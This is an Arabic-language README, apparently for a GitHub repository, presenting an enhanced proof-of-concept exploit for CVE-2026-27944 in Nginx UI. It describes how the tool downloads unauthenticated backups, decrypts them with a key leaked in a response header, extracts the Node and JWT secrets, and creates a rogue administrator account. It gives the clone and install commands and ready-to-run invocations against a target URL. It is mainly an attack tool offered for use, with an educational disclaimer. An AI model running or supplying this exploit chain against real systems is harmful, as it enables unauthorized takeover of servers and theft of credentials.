
استغلال آلي لثغرة CVE-2026-27944 في واجهة Nginx UI: يقوم بتنزيل النسخ الاحتياطية وفك تشفيرها، واستخراج الأسرار، وإنشاء حسابات مسؤول مزيفة للسيطرة الكاملة على لوحة التحكم.
يحتوي هذا المستودع على برهان مفهوم (POC) محسّن لاستغلال CVE-2026-27944، وهي ثغرة أمنية حرجة في Nginx UI.
تسمح هذه الثغرة لمهاجم غير مصادق بتنزيل النسخ الاحتياطية للنظام عبر نقطة النهاية /api/backup. علاوة على ذلك، يقوم التطبيق بتسريب مفتاح تشفير AES-256 و IV داخل ترويسة استجابة HTTP المسماة X-Backup-Security، مما يسمح للمهاجم بفك تشفير النسخة الاحتياطية التي تم تنزيلها بسهولة.
يقوم هذا الـ POC المحسّن بأتمتة سلسلة الهجوم بأكملها: تنزيل النسخة الاحتياطية، فك تشفير محتوياتها، استخراج أسرار الإعدادات (مثل Node Secret و JWT Secret)، واستغلال تلك الأسرار لتجاوز المصادقة وإنشاء حساب مسؤول مزيف للسيطرة الكاملة على لوحة التحكم.
هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. لا تستخدم هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.
X-Backup-Security لاستخراج مفتاح AES و IV المشفرين بـ Base64، وفك تشفير النسخة الاحتياطية (AES-256-CBC).app.ini المُفكك تلقائيًا لاستخراج المعلومات الحساسة:
Node Secret المستخرج (ترويسة X-Node-Secret) للتفاعل مع API وإنشاء مستخدم مسؤول جديد.pycryptodome (مطلوبة لفك تشفير AES)استنساخ المستودع:
git clone https://github.com/Skynoxk/CVE-2026-27944-POC.git
cd CVE-2026-27944-POC
تثبيت التبعيات المطلوبة:
pip install pycryptodome
python exploit_enhanced.py --target <URL> [OPTIONS]
1. تنزيل وفك تشفير النسخة الاحتياطية فقط:
python exploit_enhanced.py --target http://127.0.0.1:9000 --out backup.bin --decrypt
2. تنزيل وفك تشفير واستخراج أسرار الإعدادات:
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --show-secrets
3. سلسلة الاستغلال الكاملة (تنزيل، فك تشفير، استخراج أسرار، وإنشاء مسؤول):
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --create-user hacker --password Pwned@123!
إذا تم استخدام علامة --create-user بنجاح، سيقوم السكربت بإخراج طرق مفصلة للوصول إلى لوحة تحكم Nginx UI، بما في ذلك:
authorization باستخدام توكن JWT المسترجع.curl باستخدام ترويسة X-Node-Secret لتجاوز آليات المصادقة.| الوسيط | الوصف | الافتراضي |
|---|
--target | (مطلوب) عنوان URL الأساسي لمثيل Nginx UI (مثل http://127.0.0.1:9000) | |
--out | مسار الملف لحفظ النسخة الاحتياطية المشفرة | backup.bin |
--decrypt | فك تشفير النسخة الاحتياطية التي تم تنزيلها | False |
--extract-dir | الدليل لاستخراج الملفات المُفككة | backup_extracted |
--show-secrets | استخراج وعرض الأسرار الحساسة من app.ini | False |
--create-user | إنشاء مستخدم مسؤول للوصول إلى لوحة التحكم (حدد اسم المستخدم) | |
--password | كلمة المرور للمستخدم المسؤول المُنشأ حديثًا | Admin@123456 |